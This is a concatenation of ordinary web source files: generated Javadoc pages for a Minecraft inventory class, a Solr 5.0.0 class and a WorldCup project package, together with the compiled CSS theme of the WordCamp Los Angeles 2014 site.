<ul class="blockList">
<li class="blockList">
<h4>isUseableByPlayer</h4>
<pre>public boolean isUseableByPlayer(<a href="../../../net/minecraft/entity/player/EntityPlayer.html" title="class in net.minecraft.entity.player">EntityPlayer</a> p_70300_1_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#isUseableByPlayer(net.minecraft.entity.player.EntityPlayer)">isUseableByPlayer</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="openInventory()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>openInventory</h4>
<pre>public void openInventory()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#openInventory()">openInventory</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="closeInventory()">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>closeInventory</h4>
<pre>public void closeInventory()</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#closeInventory()">closeInventory</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
<a name="isItemValidForSlot(int, net.minecraft.item.ItemStack)">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>isItemValidForSlot</h4>
<pre>public boolean isItemValidForSlot(int p_94041_1_,
<a href="../../../net/minecraft/item/ItemStack.html" title="class in net.minecraft.item">ItemStack</a> p_94041_2_)</pre>
<dl>
<dt><strong>Specified by:</strong></dt>
<dd><code><a href="../../../net/minecraft/inventory/IInventory.html#isItemValidForSlot(int,%20net.minecraft.item.ItemStack)">isItemValidForSlot</a></code> in interface <code><a href="../../../net/minecraft/inventory/IInventory.html" title="interface in net.minecraft.inventory">IInventory</a></code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../net/minecraft/inventory/InventoryEnderChest.html" title="class in net.minecraft.inventory"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../net/minecraft/inventory/InventoryMerchant.html" title="class in net.minecraft.inventory"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?net/minecraft/inventory/InventoryLargeChest.html" target="_top">Frames</a></li>
<li><a href="InventoryLargeChest.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li>Nested | </li>
<li>Field | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
custom.css | RCowles/wclax2014 | /*
This is the Custom CSS for the WordCamp Los Angeles 2014 site.
We'll develop the theme first, and then take the compiled CSS
and add it to the site using Jetpack's Custom CSS module.
This theme, like WordPress, is licensed under the GPL.
Use it to make something cool, have fun, and share what you've learned with others.
*/
/*--------------------------------------------------------------
>>> TABLE OF CONTENTS:
----------------------------------------------------------------
1.0 - Variables
1.1 - Fonts
1.2 - Colors
2.0 - Typography
2.1 - Header
3.0 - Elements and layout
3.1 - Elements
3.2 - Layout
3.3 - Subpage layouts
4.0 - Forms
5.0 - Navigation
5.1 - Links
5.2 - Menus
5.3 - Secondary toggle
6.0 - Widgets
--------------------------------------------------------------*/
/*--------------------------------------------------------------
1.0 - Variables
--------------------------------------------------------------*/
/*--------------------------------------------------------------
1.0 Variables
--------------------------------------------------------------*/
/*--------------------------------------------------------------
1.1 Fonts
--------------------------------------------------------------*/
@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);
/*--------------------------------------------------------------
1.2 Colors
--------------------------------------------------------------*/
/*--------------------------------------------------------------
1.3 Mixins
--------------------------------------------------------------*/
/*
* Scut, a collection of Sass utilities
* to ease and improve our implementations of common style-code patterns.
* v0.10.4
* Docs at http://davidtheclark.github.io/scut
*/
/*--------------------------------------------------------------
2.0 - Typography
--------------------------------------------------------------*/
/*--------------------------------------------------------------
2.0 - Typography
--------------------------------------------------------------*/
/* line 5, sass/_typography.scss */
body,
button,
input,
select,
textarea {
color: #555e68;
font-family: "Montserrat", sans-serif; }
/* line 14, sass/_typography.scss */
h1, h2, h3, h4, h5, h6 {
color: #fd7e23;
font-family: "Montserrat", sans-serif;
text-transform: uppercase; }
/* line 22, sass/_typography.scss */
h1.entry-title {
font-size: 38px;
font-size: 3.8rem; }
/* line 28, sass/_typography.scss */
h4 {
font-size: 22px;
font-size: 2.2rem;
font-weight: 700;
margin: .5em 0; }
/* line 39, sass/_typography.scss */
.entry-meta {
font-size: 0.9em;
color: #6c7784; }
/* line 44, sass/_typography.scss */
.hentry {
border-bottom: 1px dotted #fd7e23;
padding-bottom: 1.5em; }
/* line 50, sass/_typography.scss */
.entry-content h1, .entry-content h2, .entry-content h3, .entry-content h4, .entry-content h5, .entry-content h6 {
margin: 0.5em 0.222em; }
/* line 53, sass/_typography.scss */
.entry-content h1 {
font-size: 2.25em; }
/* line 54, sass/_typography.scss */
.entry-content h2 {
font-size: 1.688em; }
/* line 55, sass/_typography.scss */
.entry-content h3 {
font-size: 1.5em; }
/* line 56, sass/_typography.scss */
.entry-content h4 {
font-size: 1.125em; }
/* line 57, sass/_typography.scss */
.entry-content h5 {
font-size: 1em; }
/* line 58, sass/_typography.scss */
.entry-content h6 {
font-size: 0.75em; }
/* line 61, sass/_typography.scss */
.comments-title {
font-size: 1.688em;
margin: 0.5em 0 0.222em; }
/* line 66, sass/_typography.scss */
.commentlist {
list-style-type: none;
margin: 1.5em 0; }
/* line 69, sass/_typography.scss */
.commentlist li.comment {
border-bottom: 1px dotted #fd7e23;
margin: 0 0 1.5em 0;
padding: 0 0 1.5em 0; }
/* line 74, sass/_typography.scss */
.commentlist footer {
overflow: hidden; }
/* line 77, sass/_typography.scss */
.commentlist .avatar {
float: left;
margin: 0 1em 0.5em 0; }
/* line 81, sass/_typography.scss */
.commentlist .comment-meta {
font-size: 0.9em;
color: #6c7784; }
/* line 85, sass/_typography.scss */
.commentlist .reply {
text-align: right; }
/* line 88, sass/_typography.scss */
.commentlist .comment-content {
margin: 1em 0 0 1em; }
/*--------------------------------------------------------------
3.0 - Elements and Layout
--------------------------------------------------------------*/
/*--------------------------------------------------------------
3.1 - Elements
--------------------------------------------------------------*/
/* line 5, sass/_elements.scss */
hr {
clear: both;
margin: 1em 0; }
/*--------------------------------------------------------------
3.2 - Layout
--------------------------------------------------------------*/
/* line 4, sass/_layout.scss */
body {
background: url("http://2014.la.wordcamp.org/files/2014/05/wcla14_tileBG-footer.png") center bottom repeat-x; }
/* Header */
/* line 9, sass/_layout.scss */
#masthead hgroup,
#masthead nav div > ul {
float: none;
margin: 0 auto;
width: 100%; }
/* line 17, sass/_layout.scss */
#masthead {
background: url("http://2014.la.wordcamp.org/files/2014/06/wcla14_header-bgSub-opt.jpg") center top no-repeat black;
height: 400px;
position: relative; }
@media (max-width: 640px) {
/* line 17, sass/_layout.scss */
#masthead {
height: 380px; } }
@media (max-width: 480px) {
/* line 17, sass/_layout.scss */
#masthead {
height: 250px; } }
/* line 30, sass/_layout.scss */
.home #masthead {
background: url("http://2014.la.wordcamp.org/files/2014/06/wcla14_header-bgImg-fade-opt.jpg") center top no-repeat black;
height: 620px; }
@media (max-width: 640px) {
/* line 30, sass/_layout.scss */
.home #masthead {
height: 380px; } }
@media (max-width: 480px) {
/* line 30, sass/_layout.scss */
.home #masthead {
height: 250px; } }
/* line 43, sass/_layout.scss */
#masthead .site-title {
text-align: center; }
/* line 46, sass/_layout.scss */
#masthead .site-title a {
background-image: url("http://2014.la.wordcamp.org/files/2014/06/wcla14_logo-opt.png");
background-size: contain;
background-position: center top;
background-repeat: no-repeat;
font-size: 0px;
margin: 0 auto;
height: 300px;
display: block; }
/* line 56, sass/_layout.scss */
.home #masthead .site-title a {
height: 527px; }
@media (max-width: 870px) {
/* line 56, sass/_layout.scss */
.home #masthead .site-title a {
height: 449px; } }
@media (max-width: 640px) {
/* line 56, sass/_layout.scss */
.home #masthead .site-title a {
height: 300px; } }
@media (max-width: 480px) {
/* line 56, sass/_layout.scss */
.home #masthead .site-title a {
height: 160px; } }
@media (max-width: 480px) {
/* line 46, sass/_layout.scss */
#masthead .site-title a {
height: 160px; } }
/* line 78, sass/_layout.scss */
#masthead .site-description {
display: none; }
/* Content & Sidebar */
/* line 85, sass/_layout.scss */
#page {
background: url("http://2014.la.wordcamp.org/files/2014/05/wcla14_tileBG-features.png") center 400px repeat-x; }
@media (max-width: 640px) {
/* line 85, sass/_layout.scss */
#page {
background-position: center 380px; } }
@media (max-width: 480px) {
/* line 85, sass/_layout.scss */
#page {
background-position: center 250px; } }
/* line 96, sass/_layout.scss */
.home #page {
background: url("http://2014.la.wordcamp.org/files/2014/05/wcla14_tileBG-features.png") center 620px repeat-x; }
@media (max-width: 640px) {
/* line 96, sass/_layout.scss */
.home #page {
background-position: center 380px; } }
@media (max-width: 480px) {
/* line 96, sass/_layout.scss */
.home #page {
background-position: center 250px; } }
/* line 109, sass/_layout.scss */
#main {
margin: 0 auto;
width: 100%;
max-width: 1100px; }
/* line 10, sass/_scut.scss */
#main:after {
content: "";
display: table;
clear: both; }
/* line 117, sass/_layout.scss */
#colophon {
clear: both;
margin: 0 auto;
width: 100%; }
/* line 123, sass/_layout.scss */
#primary {
float: left;
width: 72%;
margin-left: 1.5%; }
@media (max-width: 640px) {
/* line 123, sass/_layout.scss */
#primary {
float: none;
width: 90%;
margin: 1em auto; } }
/* line 135, sass/_layout.scss */
#secondary {
float: right;
width: 22%;
margin-right: 1.5%; }
@media (max-width: 640px) {
/* line 135, sass/_layout.scss */
#secondary {
float: none;
width: 90%;
margin: 1em auto; } }
/* Tickets */
/* line 149, sass/_layout.scss */
.tix_tickets_table th,
.tix_tickets_table td {
padding: 5px; }
/* Footer */
/* line 155, sass/_layout.scss */
#colophon {
padding: 20px 0; }
/* line 158, sass/_layout.scss */
#colophon .site-info-generator {
display: block;
text-align: center; }
/* line 162, sass/_layout.scss */
#colophon .site-info-generator:before {
content: url("http://2014.la.wordcamp.org/files/2014/05/wcla14_greyW-transparentBg.png");
display: block; }
/* line 168, sass/_layout.scss */
#colophon .site-info-network {
position: absolute;
top: 12px;
left: 4px; }
@media (max-width: 480px) {
/* line 168, sass/_layout.scss */
#colophon .site-info-network {
top: 6px;
font-size: 11px;
font-size: 1.1rem; } }
/*--------------------------------------------------------------
3.3 - Subpage layouts
--------------------------------------------------------------*/
/* Organizers Page */
/* line 6, sass/_subpages.scss */
.wcorg-organizers {
clear: both;
overflow: hidden; }
/* line 10, sass/_subpages.scss */
.wcorg-organizers .wcorg-organizer {
float: left;
padding: 1%;
width: 23%; }
@media (max-width: 870px) {
/* line 10, sass/_subpages.scss */
.wcorg-organizers .wcorg-organizer {
width: 48%; } }
/* line 18, sass/_subpages.scss */
.wcorg-organizers .wcorg-organizer img {
margin: 1em 0;
display: block;
width: 80%;
padding: 10%;
background: #dde3e6; }
/* line 26, sass/_subpages.scss */
.wcorg-organizers .sharedaddy {
display: none; }
/* Speakers Page */
/* line 33, sass/_subpages.scss */
.wcb_speaker .sharedaddy {
display: none; }
/* line 36, sass/_subpages.scss */
.wcb_speaker .avatar {
float: left;
margin: 0 1em 0.5em 0; }
/* line 42, sass/_subpages.scss */
.speaker-gravatar-list {
margin-bottom: 2.25em; }
/* Sponsors Page */
/* line 48, sass/_subpages.scss */
.wcb_sponsor .sharedaddy {
display: none; }
/* Attendees Page */
/* line 54, sass/_subpages.scss */
#tix-attendees .tix-attendee-list {
list-style: none;
margin-left: 0; }
/* line 58, sass/_subpages.scss */
#tix-attendees .tix-attendee-list li {
display: inline-block;
margin-left: -4px;
padding: 1.5%;
text-align: center;
width: 22%;
vertical-align: top; }
@media (max-width: 870px) {
/* line 58, sass/_subpages.scss */
#tix-attendees .tix-attendee-list li {
width: 30%; } }
@media (max-width: 480px) {
/* line 58, sass/_subpages.scss */
#tix-attendees .tix-attendee-list li {
width: 47%; } }
/* line 73, sass/_subpages.scss */
#tix-attendees .tix-attendee-list li .avatar {
height: auto;
float: none;
max-width: 50%;
width: auto; }
/* line 80, sass/_subpages.scss */
#tix-attendees .tix-attendee-list li .tix-field {
margin-left: 0; }
/* Schedule Page(s) */
/* line 87, sass/_subpages.scss */
.wcpt-schedule {
margin: 1em 0; }
/* line 89, sass/_subpages.scss */
.wcpt-schedule thead th {
background: #fd7e23;
color: white;
text-transform: uppercase; }
/* line 94, sass/_subpages.scss */
.wcpt-schedule th, .wcpt-schedule td {
padding: 0.5em; }
/* line 97, sass/_subpages.scss */
.wcpt-schedule td {
border-bottom: 1px solid #ffc097;
padding: 1em 0.5em; }
/* line 101, sass/_subpages.scss */
.wcpt-schedule .wcpt-session-title {
display: block;
font-size: 1.125em; }
/* line 105, sass/_subpages.scss */
.wcpt-schedule .wcpt-col-time {
width: 14%; }
/* line 108, sass/_subpages.scss */
.wcpt-schedule .wcpt-col-track {
width: 28%; }
/* line 111, sass/_subpages.scss */
.wcpt-schedule .wcpt-session-speakers {
display: block;
font-style: italic;
margin: 1em 0 0 0; }
/* line 115, sass/_subpages.scss */
.wcpt-schedule .wcpt-session-speakers:before {
content: 'Speaker: '; }
/* line 118, sass/_subpages.scss */
.wcpt-schedule .wcpt-session-speakers a {
color: #14b59d; }
/* line 122, sass/_subpages.scss */
.wcpt-schedule .lunch-break td {
background: #ffdfcb; }
/* line 124, sass/_subpages.scss */
.wcpt-schedule .lunch-break td .scb-session-lunch-break {
text-align: center; }
/* Responsive columns for use inside page/post content since we can't use shortcodes */
/* line 135, sass/_subpages.scss */
.cols2 .cols, .cols3 .cols, .cols4 .cols {
padding: 1.5%; }
/* line 10, sass/_scut.scss */
.cols2:after {
content: "";
display: table;
clear: both; }
/* line 142, sass/_subpages.scss */
.cols2 .col {
float: left;
width: 47%; }
@media (max-width: 640px) {
/* line 142, sass/_subpages.scss */
.cols2 .col {
float: none;
width: 97%; } }
/* line 10, sass/_scut.scss */
.cols3:after {
content: "";
display: table;
clear: both; }
/* line 154, sass/_subpages.scss */
.cols3 .col {
float: left;
width: 30%; }
@media (max-width: 640px) {
/* line 154, sass/_subpages.scss */
.cols3 .col {
float: none;
width: 97%; } }
/* line 10, sass/_scut.scss */
.cols4:after {
content: "";
display: table;
clear: both; }
/* line 166, sass/_subpages.scss */
.cols4 .col {
float: left;
width: 22%; }
@media (max-width: 870px) {
/* line 166, sass/_subpages.scss */
.cols4 .col {
width: 47%; } }
@media (max-width: 640px) {
/* line 166, sass/_subpages.scss */
.cols4 .col {
float: none;
width: 97%; } }
/*--------------------------------------------------------------
4.0 - Forms
--------------------------------------------------------------*/
/*--------------------------------------------------------------
5.0 - Navigation
--------------------------------------------------------------*/
/*--------------------------------------------------------------
5.0 - Navigation
--------------------------------------------------------------*/
/* line 4, sass/_navigation.scss */
nav.main-navigation {
background: white;
background: rgba(255, 255, 255, 0.7);
position: absolute;
bottom: 0; }
/* line 15, sass/_navigation.scss */
nav.main-navigation .menu-primary-container {
width: 100%;
max-width: 1100px;
margin: 0 auto; }
/* line 21, sass/_navigation.scss */
nav.main-navigation .menu {
height: 65px;
line-height: 65px; }
/* line 26, sass/_navigation.scss */
nav.main-navigation .menu li a {
color: #000;
font-weight: 700;
font-size: 18px;
font-size: 1.8rem;
padding: 0 16px;
text-shadow: 1px 1px 1px #fff;
text-transform: uppercase;
-webkit-transition: all 200ms ease-in-out;
-moz-transition: all 200ms ease-in-out;
-ms-transition: all 200ms ease-in-out;
-o-transition: all 200ms ease-in-out;
transition: all 200ms ease-in-out; }
@media (max-width: 870px) {
/* line 26, sass/_navigation.scss */
nav.main-navigation .menu li a {
font-size: 16px;
font-size: 1.6rem;
padding: 0 0.75em; } }
/* line 43, sass/_navigation.scss */
nav.main-navigation .menu li:hover > a {
background: white;
background: rgba(255, 255, 255, 0.5); }
/* line 48, sass/_navigation.scss */
nav.main-navigation .menu li ul {
background: white;
background: rgba(255, 255, 255, 0.9);
top: 65px; }
/* line 53, sass/_navigation.scss */
nav.main-navigation .menu li ul li:hover > a {
background: #45ead2; }
/* line 61, sass/_navigation.scss */
.main-small-navigation {
background: white;
background: rgba(255, 255, 255, 0.7);
display: block;
padding: 1em 0;
position: absolute;
bottom: 0;
text-align: center;
width: 100%; }
/* line 71, sass/_navigation.scss */
.main-small-navigation .menu-toggle {
font-size: 24px;
font-size: 2.4rem;
text-align: center; }
/* line 80, sass/_navigation.scss */
.main-small-navigation #menu-primary {
position: absolute;
top: 4.25em;
bottom: auto;
z-index: 100;
background: white;
background: rgba(255, 255, 255, 0.7); }
/* line 88, sass/_navigation.scss */
.main-small-navigation #menu-primary ul li {
list-style: none; }
/*--------------------------------------------------------------
5.1 - Links
--------------------------------------------------------------*/
/* line 97, sass/_navigation.scss */
a,
a:active,
a:visited {
color: #fd7e23;
text-decoration: none; }
/* line 104, sass/_navigation.scss */
a:hover {
color: #ffc097; }
/* line 109, sass/_navigation.scss */
#colophon a,
#colophon a:active,
#colophon a:visited {
color: #555e68;
text-shadow: 1px 1px 1px #fff; }
/* line 116, sass/_navigation.scss */
#colophon a:hover {
color: #555e68; }
/* line 120, sass/_navigation.scss */
#colophon a.site-info-network {
color: #ffc097;
text-shadow: 1px 1px 1px #000; }
/*--------------------------------------------------------------
6.0 - Widgets
--------------------------------------------------------------*/
/* line 4, sass/_widgets.scss */
#primary-sidebar aside h1 {
background: #fd7e23;
color: #fff;
font-size: 18px;
font-size: 1.8rem;
line-height: 12px;
padding: 24px 0 0 0;
text-align: center;
text-transform: uppercase; }
/* line 15, sass/_widgets.scss */
#primary-sidebar aside a {
text-decoration: none; }
/* line 19, sass/_widgets.scss */
#primary-sidebar aside ul {
list-style: none;
margin: 0 0 1.5em 0; }
/* line 23, sass/_widgets.scss */
#primary-sidebar aside ul li {
padding: .5em; }
/* After Header Widgets */
/* line 31, sass/_widgets.scss */
#after-header-widgets {
clear: both;
margin: 40px auto;
overflow: hidden;
width: 100%;
max-width: 1100px; }
/* line 38, sass/_widgets.scss */
#after-header-widgets .widget {
float: left;
text-align: center;
width: 25%; }
/* line 43, sass/_widgets.scss */
#after-header-widgets .widget > div {
padding: 0 1em; }
@media (max-width: 640px) {
/* line 38, sass/_widgets.scss */
#after-header-widgets .widget {
width: 47.5%;
margin: 0 1% 1em 1%;
overflow-wrap: break-word;
min-height: 330px;
min-height: 33rem; } }
@media (max-width: 480px) {
/* line 38, sass/_widgets.scss */
#after-header-widgets .widget {
float: none;
width: 95%;
margin: 1em auto;
min-height: auto; } }
/* line 61, sass/_widgets.scss */
#after-header-widgets .widget img {
-webkit-transition: all 200ms ease-in-out;
-moz-transition: all 200ms ease-in-out;
-ms-transition: all 200ms ease-in-out;
-o-transition: all 200ms ease-in-out;
transition: all 200ms ease-in-out; }
/* line 65, sass/_widgets.scss */
#after-header-widgets .widget:hover img {
-webkit-transform: scale(1.1);
-moz-transform: scale(1.1);
-ms-transform: scale(1.1);
-o-transform: scale(1.1);
transform: scale(1.1); }
/* line 72, sass/_widgets.scss */
#searchform .field {
max-width: 100%; }
|
solr-5.0.0/docs/solr-core/org/apache/solr/search/class-use/Grouping.Command.html | annieweng/solr_example | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_55) on Sun Feb 15 12:26:30 PST 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.apache.solr.search.Grouping.Command (Solr 5.0.0 API)</title>
<meta name="date" content="2015-02-15">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.apache.solr.search.Grouping.Command (Solr 5.0.0 API)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/solr/search/class-use/Grouping.Command.html" target="_top">Frames</a></li>
<li><a href="Grouping.Command.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class org.apache.solr.search.Grouping.Command" class="title">Uses of Class<br>org.apache.solr.search.Grouping.Command</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation">
<caption><span>Packages that use <a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Package</th>
<th class="colLast" scope="col">Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><a href="#org.apache.solr.search">org.apache.solr.search</a></td>
<td class="colLast">
<div class="block">
APIs and classes for <a href="../../../../../org/apache/solr/search/QParserPlugin.html" title="class in org.apache.solr.search">parsing</a> and <a href="../../../../../org/apache/solr/search/SolrIndexSearcher.html" title="class in org.apache.solr.search">processing</a> search requests</div>
</td>
</tr>
</tbody>
</table>
</li>
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="org.apache.solr.search">
<!-- -->
</a>
<h3>Uses of <a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a> in <a href="../../../../../org/apache/solr/search/package-summary.html">org.apache.solr.search</a></h3>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing subclasses, and an explanation">
<caption><span>Subclasses of <a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a> in <a href="../../../../../org/apache/solr/search/package-summary.html">org.apache.solr.search</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Class and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/solr/search/Grouping.CommandField.html" title="class in org.apache.solr.search">Grouping.CommandField</a></strong></code>
<div class="block">A group command for grouping on a field.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/solr/search/Grouping.CommandFunc.html" title="class in org.apache.solr.search">Grouping.CommandFunc</a></strong></code>
<div class="block">A command for grouping on a function.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>class </code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/solr/search/Grouping.CommandQuery.html" title="class in org.apache.solr.search">Grouping.CommandQuery</a></strong></code>
<div class="block">A group command for grouping on a query.</div>
</td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../org/apache/solr/search/package-summary.html">org.apache.solr.search</a> that return types with arguments of type <a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code><a href="http://download.oracle.com/javase/7/docs/api/java/util/List.html?is-external=true" title="class or interface in java.util">List</a><<a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a>></code></td>
<td class="colLast"><span class="strong">Grouping.</span><code><strong><a href="../../../../../org/apache/solr/search/Grouping.html#getCommands()">getCommands</a></strong>()</code> </td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../../../../org/apache/solr/search/package-summary.html">org.apache.solr.search</a> with parameters of type <a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><span class="strong">Grouping.</span><code><strong><a href="../../../../../org/apache/solr/search/Grouping.html#add(org.apache.solr.search.Grouping.Command)">add</a></strong>(<a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Grouping.Command</a> groupingCommand)</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar_bottom">
<!-- -->
</a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="../package-summary.html">Package</a></li>
<li><a href="../../../../../org/apache/solr/search/Grouping.Command.html" title="class in org.apache.solr.search">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/solr/search/class-use/Grouping.Command.html" target="_top">Frames</a></li>
<li><a href="Grouping.Command.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<p class="legalCopy"><small>
<i>Copyright © 2000-2015 Apache Software Foundation. All Rights Reserved.</i>
<script src='../../../../../prettify.js' type='text/javascript'></script>
<script type='text/javascript'>
(function(){
var oldonload = window.onload;
if (typeof oldonload != 'function') {
window.onload = prettyPrint;
} else {
window.onload = function() {
oldonload();
prettyPrint();
}
}
})();
</script>
</small></p>
</body>
</html>
|
doc/cn/edu/shu/worldcup/dao/package-frame.html | WC3/WorldCup | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="zh">
<head>
<!-- Generated by javadoc (1.8.0_05) on Wed Jul 30 12:53:27 CST 2014 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>cn.edu.shu.worldcup.dao</title>
<meta name="date" content="2014-07-30">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
